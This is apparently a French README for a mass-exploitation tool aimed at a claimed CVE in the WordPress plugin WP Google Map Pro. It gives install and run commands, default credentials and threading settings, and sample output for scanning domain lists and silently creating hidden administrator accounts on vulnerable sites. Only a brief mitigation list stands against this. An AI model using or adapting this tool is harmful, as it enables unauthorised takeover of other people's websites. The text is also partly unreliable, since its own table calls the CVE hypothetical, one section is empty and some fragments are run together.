
Cet outil exploite la vulnérabilité CVE-2026-8732 dans le plugin WP Google Map Pro pour WordPress. Cette vulnérabilité permet à un attaquant non authentifié d'obtenir un wpmp_token valide via un point de terminaison AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). En utilisant ce jeton, un attaquant peut accéder au panneau d'administration de WordPress et créer un nouvel utilisateur administrateur.
L'outil effectue un scan de masse à partir d'une liste de domaines, extrait le nonce et le jeton, puis crée automatiquement un compte administrateur caché sur les sites vulnérables. Les résultats sont enregistrés en temps réel avec tous les détails du jeton.
admin_created.txthttp:// et https://requestsInstallez la bibliothèque requise :
pip install requests
🚀 Installation
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Utilisation
Préparez un fichier de liste de cibles (un domaine par ligne) :
example.com
https://target-website.com
http://vulnerable-site.org
Lancez le scanner :
python2 exploit.py targets.txt
Fichiers de sortie
Fichier Contenu res.txt Domaines vulnérables avec jeton complet et URL de redirection (le cas échéant) admin_created.txt Identifiants administrateur créés avec succès (domaine, nom d'utilisateur, mot de passe, e-mail)
Exemple de sortie
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Configuration
Modifiez les variables suivantes dans le script :
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Comment ça fonctionne
🛡️ Atténuation
· Mettez à jour WP Google Map Pro vers la dernière version corrigée. · Désactivez l'action AJAX wpgmp_temp_access_ajax via un code personnalisé ou un pare-feu. · Utilisez un pare-feu applicatif (WAF) pour bloquer les requêtes malveillantes vers admin-ajax.php.
| Champ | Valeur |
|---|
| Identifiant CVE | CVE-2026-8732 (hypothétique pour ce plugin) |
| Plugin concerné | WP Google Map Pro (versions <= 1.5.0) |
| Type de vulnérabilité | Contrôle d'accès cassé / élévation de privilèges |
| Vecteur d'attaque | Non authentifié, à distance |
| Impact | Prise de contrôle totale du site via la création d'un compte administrateur |